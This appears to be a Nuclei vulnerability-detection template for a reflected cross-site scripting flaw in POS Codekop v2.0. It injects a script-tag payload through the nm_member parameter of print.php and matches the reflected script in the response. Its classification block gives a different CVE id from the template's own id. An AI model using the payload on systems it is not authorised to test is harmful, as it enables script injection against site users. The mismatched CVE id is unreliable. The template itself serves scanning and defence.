45 lines
1.1 KiB
YAML
45 lines
1.1 KiB
YAML
id: CVE-2023-36346
|
|
|
|
info:
|
|
name: POS Codekop v2.0 - Cross-site Scripting
|
|
author: r3Y3r53
|
|
severity: medium
|
|
description: |
|
|
POS Codekop v2.0 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the nm_member parameter at print.php.
|
|
reference:
|
|
- https://yuyudhn.github.io/pos-codekop-vulnerability/
|
|
- https://www.youtube.com/watch?v=bbbA-q1syrA
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2023-36346
|
|
classification:
|
|
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2023-30256
|
|
cwe-id: CWE-79
|
|
metadata:
|
|
max-request: 1
|
|
verified: "true"
|
|
tags: cve,cve2023,xss,pos,codekop,unauth
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/print.php?nm_member=<script>alert(document.location)</script>"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "<script>alert(document.location)</script>"
|
|
- "<title>print</title>"
|
|
condition: and
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- 'text/html'
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|